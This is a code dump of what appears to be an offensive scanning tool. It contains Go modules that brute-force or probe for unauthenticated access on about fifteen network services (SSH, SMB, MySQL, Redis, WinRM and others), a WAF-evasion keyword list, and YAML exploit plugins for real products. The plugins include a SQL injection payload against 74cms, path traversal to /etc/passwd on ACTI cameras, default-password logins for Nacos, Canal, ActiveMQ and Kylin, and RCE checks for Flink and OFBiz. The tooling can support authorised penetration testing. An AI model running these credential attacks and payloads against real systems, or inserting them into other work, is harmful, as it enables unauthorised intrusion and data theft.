17 | Payload: models.Dict{
18 | User: t.Dict.User,
19 | Password: t.Dict.Password,
20 | },
21 | Target: t.Target,
22 | }
23 | )
24 | conn, err := ftp.Dial(t.Target, ftp.DialWithDialFunc(func(network, address string) (net.Conn, error) {
25 | return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
26 | }))
27 | if err != nil {
28 | return nil
29 | }
30 | if err = conn.Login(t.Dict.User, t.Dict.Password); err != nil {
31 | return nil
32 | }
33 | conn.Logout()
34 | return msg
35 | }
36 |
--------------------------------------------------------------------------------
/core/hydra/memcached.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "prismx_cli/core/models"
5 | "prismx_cli/utils/netUtils"
6 | "strings"
7 | "time"
8 | )
9 |
10 | func MemcachedWeakPass(res any) any {
11 | t := res.(models.HydraTask)
12 | client, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
13 | if err != nil {
14 | return nil
15 | }
16 | defer client.Close()
17 | if client.SetDeadline(time.Now().Add(t.Config.Timeout)) != nil {
18 | return nil
19 | }
20 | _, err = client.Write([]byte("stats\n"))
21 | if err != nil {
22 | return nil
23 | }
24 | rev := make([]byte, 1024)
25 | n, err := client.Read(rev)
26 | if err != nil {
27 | return nil
28 | }
29 | if !strings.Contains(string(rev[:n]), "STAT") {
30 | return nil
31 | }
32 | return models.MSG{
33 | Name: "Memcached unauthorized",
34 | Type: "Unauthorized",
35 | Payload: models.Dict{},
36 | Target: t.Target,
37 | }
38 | }
39 |
--------------------------------------------------------------------------------
/core/hydra/mongodb.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "context"
5 | "fmt"
6 | "go.mongodb.org/mongo-driver/mongo"
7 | "go.mongodb.org/mongo-driver/mongo/options"
8 | "go.mongodb.org/mongo-driver/mongo/readpref"
9 | "prismx_cli/core/models"
10 | )
11 |
12 | func MongodbWeakPass(res any) any {
13 | var (
14 | t = res.(models.HydraTask)
15 | msg = models.MSG{
16 | Name: "Mongodb WeakPassword",
17 | Type: "WeakPassword",
18 | Payload: models.Dict{
19 | User: t.Dict.User,
20 | Password: t.Dict.Password,
21 | },
22 | Target: t.Target,
23 | }
24 | )
25 | ctx, cancel := context.WithTimeout(context.Background(), t.Config.Timeout)
26 | opt := options.Client()
27 | opt.SetDialer(&proxyDialer{
28 | timeout: t.Config.Timeout,
29 | })
30 | opt.ApplyURI(fmt.Sprintf("mongodb://%v:%v@%v/ichunt?authMechanism=SCRAM-SHA-1", t.Dict.User, t.Dict.Password, t.Target))
31 | client, err := mongo.Connect(ctx, opt)
32 | defer cancel()
33 | if err != nil {
34 | return nil
35 | }
36 | defer client.Disconnect(ctx)
37 | if err = client.Ping(context.Background(), readpref.Primary()); err != nil {
38 | return nil
39 | }
40 | return msg
41 | }
42 |
--------------------------------------------------------------------------------
/core/hydra/mssql.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "database/sql"
5 | "fmt"
6 | _ "github.com/denisenkom/go-mssqldb"
7 | mssql "github.com/denisenkom/go-mssqldb"
8 | "net"
9 | "prismx_cli/core/models"
10 | )
11 |
12 | func MSSQLWeakPass(res any) any {
13 | var (
14 | t = res.(models.HydraTask)
15 | msg = models.MSG{
16 | Name: "MSSQL WeakPassword",
17 | Type: "WeakPassword",
18 | Payload: models.Dict{
19 | User: t.Dict.User,
20 | Password: t.Dict.Password,
21 | },
22 | Target: t.Target,
23 | }
24 | )
25 | host, port, err := net.SplitHostPort(t.Target)
26 | if err != nil {
27 | return nil
28 | }
29 | conn, err := mssql.NewConnector(fmt.Sprintf("server=%s;user id=%s;password=%s;port=%v;encrypt=disable;timeout=%v", host, t.Dict.User, t.Dict.Password, port, t.Config.Timeout))
30 | if err != nil {
31 | return nil
32 | }
33 | conn.Dialer = &proxyDialer{
34 | timeout: t.Config.Timeout,
35 | }
36 | db := sql.OpenDB(conn)
37 | if err = db.Ping(); err != nil {
38 | return nil
39 | }
40 | db.Close()
41 | return msg
42 | }
43 |
--------------------------------------------------------------------------------
/core/hydra/mysql.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "context"
5 | "database/sql"
6 | "fmt"
7 | "github.com/go-sql-driver/mysql"
8 | "net"
9 | "prismx_cli/core/models"
10 | "prismx_cli/utils/netUtils"
11 | )
12 |
13 | type noLog struct{}
14 |
15 | func (noLog) Print(v ...interface{}) {}
16 | func init() {
17 | mysql.SetLogger(noLog{})
18 | }
19 |
20 | func MySQLWeakPass(res any) any {
21 |
22 | var (
23 | t = res.(models.HydraTask)
24 | msg = models.MSG{
25 | Name: "MySQL WeakPassword",
26 | Type: "WeakPassword",
27 | Payload: models.Dict{
28 | User: t.Dict.User,
29 | Password: t.Dict.Password,
30 | },
31 | Target: t.Target,
32 | }
33 | )
34 |
35 | db, err := sql.Open("mysql", fmt.Sprintf("%v:%v@tcp(%s)/information_schema?charset=utf8&timeout=%v", t.Dict.User, t.Dict.Password, t.Target, t.Config.Timeout))
36 | if err != nil {
37 | return nil
38 | }
39 |
40 | //设置代理
41 | mysql.RegisterDialContext("tcp", func(ctx context.Context, addr string) (net.Conn, error) {
42 | return netUtils.SendDialTimeout("tcp", addr, t.Config.Timeout)
43 | })
44 |
45 | defer db.Close()
46 |
47 | if err = db.Ping(); err != nil {
48 | return nil
49 | }
50 | return msg
51 | }
52 |
--------------------------------------------------------------------------------
/core/hydra/oracle.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "net"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/go-ora"
7 | "strconv"
8 | )
9 |
10 | func OracleWeakPass(res any) any {
11 | var serviceName = []string{
12 | "orcl",
13 | "xe",
14 | "oracle",
15 | }
16 |
17 | var (
18 | t = res.(models.HydraTask)
19 | msg = models.MSG{
20 | Name: "Oracle WeakPassword",
21 | Type: "WeakPassword",
22 | Payload: models.Dict{
23 | User: t.Dict.User,
24 | Password: t.Dict.Password,
25 | },
26 | Target: t.Target,
27 | }
28 | )
29 | host, por, err := net.SplitHostPort(t.Target)
30 | if err != nil {
31 | return nil
32 | }
33 | atoi, err := strconv.Atoi(por)
34 | if err != nil {
35 | return nil
36 | }
37 | for _, service := range serviceName {
38 | connection, err := go_ora.NewConnection(go_ora.BuildUrl(host, atoi, service, t.Dict.User, t.Dict.Password, nil))
39 | if err != nil {
40 | continue
41 | }
42 | if err := connection.Open(); err != nil {
43 | continue
44 | }
45 | connection.Close()
46 | return msg
47 | }
48 | return nil
49 | }
50 |
--------------------------------------------------------------------------------
/core/hydra/postgres.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "context"
5 | "fmt"
6 | "github.com/jackc/pgx/v5"
7 | "net"
8 | "prismx_cli/core/models"
9 | "prismx_cli/utils/netUtils"
10 | )
11 |
12 | func PGSQLWeakPass(res any) any {
13 | var (
14 | t = res.(models.HydraTask)
15 | msg = models.MSG{
16 | Name: "Postgres WeakPassword",
17 | Type: "WeakPassword",
18 | Payload: models.Dict{
19 | User: t.Dict.User,
20 | Password: t.Dict.Password,
21 | },
22 | Target: t.Target,
23 | }
24 | )
25 | config, err := pgx.ParseConfig(fmt.Sprintf("postgres://%v:%v@%s/postgres?sslmode=disable", t.Dict.User, t.Dict.Password, t.Target))
26 | if err != nil {
27 | return nil
28 | }
29 | config.DialFunc = func(ctx context.Context, network, addr string) (net.Conn, error) {
30 | return netUtils.SendDialTimeout(network, addr, t.Config.Timeout)
31 | }
32 | ctx := context.Background()
33 |
34 | conn, err := pgx.ConnectConfig(ctx, config)
35 | if err != nil {
36 | return nil
37 | }
38 | defer conn.Close(ctx)
39 | if err = conn.Ping(ctx); err != nil {
40 | return nil
41 | }
42 | return msg
43 | }
44 |
--------------------------------------------------------------------------------
/core/hydra/redis.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "github.com/go-redis/redis"
5 | "net"
6 | "prismx_cli/core/models"
7 | "prismx_cli/utils/netUtils"
8 | )
9 |
10 | func RedisWeakPass(res any) any {
11 |
12 | var (
13 | t = res.(models.HydraTask)
14 | msg = models.MSG{
15 | Name: "Redis WeakPassword",
16 | Type: "WeakPassword",
17 | Payload: models.Dict{
18 | User: t.Dict.User,
19 | Password: t.Dict.Password,
20 | },
21 | Target: t.Target,
22 | }
23 | )
24 | redisShell := redis.NewClient(&redis.Options{
25 | Addr: t.Target,
26 | DB: 0,
27 | Password: t.Dict.Password,
28 | Dialer: func() (net.Conn, error) {
29 | return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
30 | },
31 | })
32 |
33 | pong, err := redisShell.Ping().Result()
34 | if err != nil {
35 | return nil
36 | }
37 | defer redisShell.Close()
38 |
39 | //如果不等于pong那么就是蜜罐,任务直接停止
40 | if pong != "PONG" {
41 | return nil
42 | }
43 | if t.Dict.Password == "" {
44 | msg.Name = "Redis Unauthorized"
45 | msg.Type = "Unauthorized"
46 | }
47 | return msg
48 | }
49 |
--------------------------------------------------------------------------------
/core/hydra/smb.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "github.com/hirochachacha/go-smb2"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/netUtils"
7 | )
8 |
9 | func SMBWeakPass(res any) any {
10 | var (
11 | t = res.(models.HydraTask)
12 | msg = models.MSG{
13 | Name: "SMB WeakPassword",
14 | Type: "WeakPassword",
15 | Payload: models.Dict{
16 | User: t.Dict.User,
17 | Password: t.Dict.Password,
18 | },
19 | Target: t.Target,
20 | }
21 | )
22 | conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
23 | if err != nil {
24 | return nil
25 | }
26 | d := &smb2.Dialer{
27 | Initiator: &smb2.NTLMInitiator{
28 | User: t.Dict.User,
29 | Password: t.Dict.Password,
30 | },
31 | }
32 | s, err := d.Dial(conn)
33 | if err != nil {
34 | return nil
35 | }
36 | s.Logoff()
37 | conn.Close()
38 | return msg
39 | }
40 |
--------------------------------------------------------------------------------
/core/hydra/snmp.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "prismx_cli/core/models"
5 | "prismx_cli/utils/go-snmp"
6 | "prismx_cli/utils/netUtils"
7 | )
8 |
9 | func SNMPWeakPass(res any) any {
10 | var (
11 | t = res.(models.HydraTask)
12 | msg = models.MSG{
13 | Name: "SNMP Unauthorized",
14 | Type: "Unauthorized",
15 | Payload: models.Dict{},
16 | Target: t.Target,
17 | }
18 | )
19 |
20 | // Open a UDP connection to the target
21 | conn, err := netUtils.SendDialTimeout("udp", t.Target, t.Config.Timeout)
22 | if err != nil {
23 | return nil
24 | }
25 |
26 | snmp := &go_snmp.GoSNMP{t.Target, "public", go_snmp.Version2c, t.Config.Timeout, conn}
27 |
28 | resp, err := snmp.Get(".1.3.6.1.2.1.1.1.0")
29 | if err != nil {
30 | return nil
31 | }
32 | for _, v := range resp.Variables {
33 | switch v.Type {
34 | case go_snmp.OctetString:
35 | return msg
36 | }
37 | }
38 | return nil
39 | }
40 |
--------------------------------------------------------------------------------
/core/hydra/ssh.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "golang.org/x/crypto/ssh"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/netUtils"
7 | )
8 |
9 | func SSHWeakPass(res any) any {
10 | var (
11 | t = res.(models.HydraTask)
12 | msg = models.MSG{
13 | Name: "SSH WeakPassword",
14 | Type: "WeakPassword",
15 | Payload: models.Dict{
16 | User: t.Dict.User,
17 | Password: t.Dict.Password,
18 | },
19 | Target: t.Target,
20 | }
21 | )
22 |
23 | proxy, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
24 | if err != nil {
25 | return nil
26 | }
27 | defer proxy.Close()
28 | config := &ssh.ClientConfig{
29 | User: t.Dict.User,
30 | Timeout: t.Config.Timeout,
31 | HostKeyCallback: ssh.InsecureIgnoreHostKey(),
32 | Auth: []ssh.AuthMethod{ssh.Password(t.Dict.Password)},
33 | }
34 | conn, _, _, err := ssh.NewClientConn(proxy, t.Target, config)
35 | if err != nil {
36 | return nil
37 | }
38 | defer conn.Close()
39 | return msg
40 | }
41 |
--------------------------------------------------------------------------------
/core/hydra/telnet.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "prismx_cli/core/models"
5 | "prismx_cli/utils/go-telnet"
6 | )
7 |
8 | func TelnetWeakPass(res any) any {
9 | var (
10 | t = res.(models.HydraTask)
11 | msg = models.MSG{
12 | Name: "Telnet WeakPassword",
13 | Type: "WeakPassword",
14 | Payload: models.Dict{
15 | User: t.Dict.User,
16 | Password: t.Dict.Password,
17 | },
18 | Target: t.Target,
19 | }
20 | )
21 |
22 | c := &telnet.Client{
23 | UserName: t.Dict.User,
24 | Password: t.Dict.Password,
25 | LastResponse: "",
26 | ServerType: telnet.UsernameAndPassword,
27 | }
28 |
29 | if err := c.Connect(t.Target, t.Config.Timeout); err != nil {
30 | return nil
31 | }
32 |
33 | if err := c.Login(); err != nil {
34 | return nil
35 | }
36 | return msg
37 | }
38 |
--------------------------------------------------------------------------------
/core/hydra/vnc.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "context"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/go-vnc"
7 | "prismx_cli/utils/netUtils"
8 | )
9 |
10 | func VncWeakPass(res any) any {
11 |
12 | var (
13 | t = res.(models.HydraTask)
14 | msg = models.MSG{
15 | Name: "VNC WeakPassword",
16 | Type: "WeakPassword",
17 | Payload: models.Dict{
18 | User: t.Dict.User,
19 | Password: t.Dict.Password,
20 | },
21 | Target: t.Target,
22 | }
23 | )
24 |
25 | conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
26 | if err != nil {
27 | return nil
28 | }
29 | vc, err := vnc.Connect(context.Background(), conn, vnc.NewClientConfig(t.Dict.Password))
30 | if err != nil {
31 | return nil
32 | }
33 | vc.Close()
34 | return msg
35 | }
36 |
--------------------------------------------------------------------------------
/core/hydra/winrm.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "context"
5 | "github.com/masterzen/winrm"
6 | "net"
7 | "os"
8 | "prismx_cli/core/models"
9 | "prismx_cli/utils/netUtils"
10 | "strconv"
11 | )
12 |
13 | func WinRMWeakPass(res any) any {
14 | var (
15 | t = res.(models.HydraTask)
16 | msg = models.MSG{
17 | Name: "WinRM WeakPassword",
18 | Type: "WeakPassword",
19 | Payload: models.Dict{},
20 | Target: t.Target,
21 | }
22 | )
23 |
24 | params := winrm.DefaultParameters
25 | params.Dial = func(network, addr string) (net.Conn, error) {
26 | return netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
27 | }
28 | host, port, _ := net.SplitHostPort(t.Target)
29 | intPort, _ := strconv.Atoi(port)
30 | client, err := winrm.NewClientWithParameters(winrm.NewEndpoint(host, intPort, false, false, nil, nil, nil, t.Config.Timeout), t.Dict.User, t.Dict.Password, params)
31 | if err != nil {
32 | return nil
33 | }
34 | ctx, cancel := context.WithCancel(context.Background())
35 | defer cancel()
36 | _, err = client.RunWithContext(ctx, "echo ok > nul", os.Stdout, os.Stderr)
37 | if err != nil {
38 | return nil
39 | }
40 | return msg
41 | }
42 |
--------------------------------------------------------------------------------
/core/hydra/zookeeper.go:
--------------------------------------------------------------------------------
1 | package hydra
2 |
3 | import (
4 | "bytes"
5 | "prismx_cli/core/models"
6 | "prismx_cli/utils/netUtils"
7 | )
8 |
9 | func ZookeeperWeakPass(res any) any {
10 | var (
11 | t = res.(models.HydraTask)
12 | msg = models.MSG{
13 | Name: "Zookeeper Unauthorized",
14 | Type: "Unauthorized",
15 | Payload: models.Dict{},
16 | Target: t.Target,
17 | }
18 | )
19 | conn, err := netUtils.SendDialTimeout("tcp", t.Target, t.Config.Timeout)
20 | if err != nil {
21 | return nil
22 | }
23 | _, err = conn.Write([]byte("envi"))
24 | if err != nil {
25 | return nil
26 | }
27 | reply := make([]byte, 1024)
28 | n, err := conn.Read(reply)
29 | if err != nil {
30 | return nil
31 | }
32 | if bytes.Contains(reply[:n], []byte("Environment")) {
33 | return msg
34 | }
35 | return nil
36 | }
37 |
--------------------------------------------------------------------------------
/core/owaspTop10/utils/utils.go:
--------------------------------------------------------------------------------
1 | package utils
2 |
3 | import (
4 | "net/url"
5 | "strings"
6 | )
7 |
8 | var WafKeyWord = []string{"造成安全威胁", "Bot-Block-ID", "您访问IP已被管理员限制", "本次事件ID", "当前访问疑似黑客攻击",
9 | "safedog", "拦截", "ValidateInputIfRequiredByConfig", "You don't have permission to access", "非法字符"}
10 |
11 | func ParseQuery(target *url.URL, payload string) (item []string) {
12 |
13 | paramMap, err := url.ParseQuery(target.RawQuery)
14 | if err != nil {
15 | return
16 | }
17 | //如果没有抓到带参数的url,直接返回
18 | if len(paramMap) == 0 {
19 | return
20 | }
21 | for key, value := range paramMap {
22 | item = append(item, strings.Replace(target.String(), key+"="+value[0], key+"="+value[0]+payload, 1))
23 | }
24 | return item
25 | }
26 |
--------------------------------------------------------------------------------
/core/plugins/exploits/360_TianQing_ccid_SQL_injectable.yaml:
--------------------------------------------------------------------------------
1 | app: 360天擎
2 | query: title:"360新天擎"
3 | meta:
4 | name: 360 TianQing ccid SQL injectable
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: 天擎存在SQL注入漏洞,攻击者可以通过漏洞上传木马获取计算机权限。
9 | homepage: https://www.qianxin.com/product/detail/pid/49
10 | author: 一曲成殇
11 | references: ''
12 | solution: 安装官方补丁、升级系统版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /api/dp/rptsvcsyncpoint?ccid=1
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: code
25 | value: "200"
26 | type: equals
27 | create_at: "2021-10-15 14:27:08"
28 |
--------------------------------------------------------------------------------
/core/plugins/exploits/74cms_5.0.1_前台SQL注入.yaml:
--------------------------------------------------------------------------------
1 | app: 74cms
2 | query: body:"74cms"
3 | meta:
4 | name: 74cms 5.0.1 前台SQL注入
5 | level: 4
6 | tags:
7 | - sql_injection
8 | description: |-
9 | 骑士人才系统(74cms)是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。
10 | 74cms 5.0.1前台AjaxPersonalController.class.php文件存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。
11 | homepage: http://www.74cms.com/
12 | author: 一曲成殇
13 | references: https://www.t00ls.net/articles-54436.html
14 | solution: 升级官方版本
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa")
22 | and extractvalue(1,concat(0x7e,md5(99999999))) -- a
23 | redirect: true
24 | header: [ ]
25 | params: ""
26 | response:
27 | - name: body
28 | value: ef775988943825d2871e1cfa75473ec
29 | type: contains
30 | create_at: "2021-11-05 17:39:51"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/ACTI_Camera_images_File_read.yaml:
--------------------------------------------------------------------------------
1 | app: ACTI Camera
2 | query: title:"Web Configurator"
3 | meta:
4 | name: ACTI Camera images File read
5 | level: 4
6 | tags:
7 | - file_include
8 | description: 服务器任意文件读取
9 | homepage: http://www.acti.com
10 | author: 一曲成殇
11 | references: ''
12 | solution: ""
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /images/../../../../../../../../etc/passwd
20 | redirect: true
21 | header:
22 | - Content-type: application/x-www-form-urlencoded
23 | params: ""
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: root
30 | type: contains
31 | create_at: "2021-10-15 14:47:03"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Alibaba_Canal_Default_Password.yaml:
--------------------------------------------------------------------------------
1 | app: Alibaba Canal
2 | query: body:"canal"
3 | meta:
4 | name: Alibaba Canal Default Password
5 | level: 3
6 | tags:
7 | - weak_password
8 | description: 默认密码:admin/123456
9 | homepage: https://github.com/alibaba/canal
10 | author: 一曲成殇
11 | references: https://www.cnblogs.com/xiexiandong/p/12888582.html
12 | solution: 修改复杂密码
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /api/v1/user/login
20 | redirect: false
21 | header:
22 | - Content-Type: application/json
23 | params: '{"username":"admin","password":"123456"}'
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: com.alibaba.otter.canal.admin.controller.UserController.login
30 | type: contains
31 | create_at: "2021-11-05 17:55:28"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Alibaba_Canal_Info_Leak.yaml:
--------------------------------------------------------------------------------
1 | app: Alibaba Canal
2 | query: body:"canal"
3 | meta:
4 | name: Alibaba Canal Info Leak
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: |-
9 | canal是阿里巴巴旗下的一款开源项目,纯Java开发。
10 | Alibaba Canal存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。
11 | homepage: https://github.com/alibaba/canal
12 | author: 一曲成殇
13 | references: ' https://my.oschina.net/u/4581879/blog/4753320'
14 | solution: 设置接口访问策略
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: GET
21 | path: /api/v1/canal/config/1/1
22 | redirect: true
23 | header: [ ]
24 | params: ""
25 | response:
26 | - name: body
27 | value: ncanal.aliyun.accessKey
28 | type: contains
29 | - name: code
30 | value: "200"
31 | type: equals
32 | create_at: "2021-11-05 18:01:15"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Alibaba_Nacos_控制台默认弱口令.yaml:
--------------------------------------------------------------------------------
1 | app: Alibaba-Nacos
2 | query: protocol:"http"
3 | meta:
4 | name: Alibaba Nacos 控制台默认弱口令
5 | level: 4
6 | tags:
7 | - weak_password
8 | description: Alibaba Nacos 控制台存在默认弱口令 nacos/nacos,可登录后台查看敏感信息
9 | homepage: https://github.com/alibaba/nacos
10 | author: 一曲成殇
11 | references: ''
12 | solution: 及时修改账户信息
13 | steps:
14 | verify_steps:
15 | type: or
16 | verify:
17 | - request:
18 | method: POST
19 | path: /nacos/v1/auth/users/login
20 | redirect: false
21 | header:
22 | - Content-Type: application/x-www-form-urlencoded
23 | params: username=nacos&password=nacos
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: "{\"accessToken\""
30 | type: contains
31 | create_at: "2021-10-15 15:08:55"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apach_Solr_File_Read.yaml:
--------------------------------------------------------------------------------
1 | app: solr
2 | query: body:"solr"
3 | meta:
4 | name: Apach Solr File Read
5 | level: 4
6 | tags:
7 | - file_include
8 | description: 攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。
9 | homepage: https://solr.apache.org/
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/DUANYU23/article/details/115588061
12 | solution: 限制url路径的访问
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /solr/admin/cores?indexInfo=false&wt=json
20 | redirect: true
21 | header: [ ]
22 | params: ""
23 | response:
24 | - name: body
25 | value: instanceDir
26 | type: contains
27 | - name: code
28 | value: "200"
29 | type: equals
30 | create_at: "2021-11-08 21:38:54"
31 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache Kylin Console 控制台弱口令.yaml:
--------------------------------------------------------------------------------
1 | app: Apache Kylin
2 | query: body:"Apache Kylin"
3 | meta:
4 | name: Apache Kylin Console 控制台弱口令
5 | level: 3
6 | tags:
7 | - weak_password
8 | description: Apache Kylin Console 控制台存在默认弱口令 admin:KYLIN,可被登录控制台进一步利用其他漏洞
9 | homepage: http://kylin.apache.org
10 | author: Administrator
11 | references: ""
12 | solution: 设置复杂密码
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: GET
19 | path: /kylin/api/user/authentication
20 | redirect: true
21 | header:
22 | - Authorization: Basic YWRtaW46S1lMSU4=
23 | - Cookie: project=null
24 | params: ""
25 | response:
26 | - name: code
27 | value: "200"
28 | type: equals
29 | - name: code
30 | value: "401"
31 | type: not equals
32 | create_at: "2022-05-23 11:10:05"
33 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache_ActiveMQ默认密码.yaml:
--------------------------------------------------------------------------------
1 | app: ActiveMQ
2 | query: app:"ActiveMQ"
3 | meta:
4 | name: Apache ActiveMQ 默认密码
5 | level: 3
6 | tags:
7 | - weak_password
8 | description: 使用了默认密码admin/admin
9 | homepage: http://activemq.apache.org/
10 | author: 一曲成殇
11 | references: https://blog.csdn.net/ge00111/article/details/72765210
12 | solution: 修改默认密码,可在/conf/users.properties文件中查找
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /admin/
20 | redirect: true
21 | header:
22 | - Authorization: Basic YWRtaW46YWRtaW4=
23 | params: ""
24 | response:
25 | - name: body
26 | value: Welcome to the Apache ActiveMQ
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2021-11-05 17:49:35"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache_Cocoon_Xml_注入_CVE-2020-11991.yaml:
--------------------------------------------------------------------------------
1 | app: Apache Cocoon
2 | query: title:"Dspace Home"
3 | meta:
4 | name: Apache Cocoon Xml 注入 CVE-2020-11991
5 | level: 3
6 | tags:
7 | - xxe
8 | description: |-
9 | CVE-2020-11991 与 StreamGenerator 有关,在使用 StreamGenerator 时,代码将解析用户提供的 xml。攻击者可以使用包括外部系统实体在内的特制 xml 来访问服务器系统上的任何文件。
10 | Apache Cocoon <= 2.1.12
11 | homepage: http://cocoon.apache.org/2.1/
12 | author: 一曲成殇
13 | references: ""
14 | solution: ""
15 | steps:
16 | verify_steps:
17 | type: and
18 | verify:
19 | - request:
20 | method: POST
21 | path: /go-ora/api/product/manger/getInfo
22 | redirect: true
23 | header: [ ]
24 | params: \n ]>\n\nJohn \n&ent;\n
26 | response:
27 | - name: code
28 | value: "200"
29 | type: equals
30 | - name: body
31 | value: root
32 | type: equals
33 | create_at: "2021-10-15 15:36:48"
34 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache_Flink_Upload_RCE.yaml:
--------------------------------------------------------------------------------
1 | app: Apache-Flink
2 | query: body:"Apache Flink Dashboard"
3 | meta:
4 | name: Apache Flink Upload RCE
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache
9 | flink允许上传任意的jar包从而导致远程代码执行。
10 | homepage: https://flink.apache.org/
11 | author: 一曲成殇
12 | references: https://www.cnblogs.com/tree1123/p/11933285.html
13 | solution: 建议用户关注Apache Flink官网,及时获取该漏洞最新补丁。
14 | steps:
15 | verify_steps:
16 | type: and
17 | verify:
18 | - request:
19 | method: GET
20 | path: /jars
21 | redirect: false
22 | header: [ ]
23 | params: ""
24 | response:
25 | - name: code
26 | value: "200"
27 | type: equals
28 | - name: body
29 | value: json
30 | type: contains
31 | create_at: "2021-11-08 21:23:08"
32 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache_Kylin的未授权配置泄露漏洞.yaml:
--------------------------------------------------------------------------------
1 | app: Apache Kylin
2 | query: body:"Apache Kylin"
3 | meta:
4 | name: Apache Kylin的未授权配置泄露漏洞
5 | level: 4
6 | tags:
7 | - information_leakage
8 | description: Apache Kylin 有一个restful api会在没有认可认证的情况下暴露配置信息,攻击者可利用该漏洞获取系统敏感信息。
9 | homepage: http://kylin.apache.org/cn/download/
10 | author: 一曲成殇
11 | references: https://v2.s.tencent.com/research/bsafe/1156.html
12 | solution: |-
13 | 升级到安全版本,或执行以下缓解措施:
14 | 编辑 "$KYLIN_HOME/WEB-INF/classes/kylinSecurity.xml";
15 | 删除下列行 "";
16 | 重启 Kylin实例以使其生效。
17 | steps:
18 | verify_steps:
19 | type: and
20 | verify:
21 | - request:
22 | method: GET
23 | path: /kylin/api/admin/config
24 | redirect: false
25 | header: [ ]
26 | params: ""
27 | response:
28 | - name: body
29 | value: config
30 | type: contains
31 | - name: code
32 | value: "200"
33 | type: equals
34 | create_at: "2021-11-05 22:26:52"
35 |
--------------------------------------------------------------------------------
/core/plugins/exploits/Apache_Ofbiz_XMLRPC_RCE漏洞CVE-2020-9496.yaml:
--------------------------------------------------------------------------------
1 | app: Apache OFBiz
2 | query: body:"ofbiz"
3 | meta:
4 | name: Apache Ofbiz XMLRPC RCE漏洞(CVE-2020-9496)
5 | level: 4
6 | tags:
7 | - remote_code_execution
8 | description: Apache ofbiz 存在反序列化漏洞,攻击者 通过 访问未授权接口,构造特定的xmlrpc http请求,可以造成远程代码执行的影响。
9 | homepage: http://ofbiz.apache.org/
10 | author: 一曲成殇
11 | references: https://www.cnblogs.com/ph4nt0mer/p/13576739.html
12 | solution: 1、建议升级至最新版本
13 | steps:
14 | verify_steps:
15 | type: and
16 | verify:
17 | - request:
18 | method: POST
19 | path: /webtools/control/xmlrpc
20 | redirect: true
21 | header:
22 | - Content-Type: application/xml
23 | params: ProjectDiscoverydwisiswant0
24 | response:
25 | - name: body
26 | value: No such service
27 | type: contains
28 | - name: code
29 | value: "200"
30 | type: equals
31 | create_at: "2021-11-08 21:30:11"
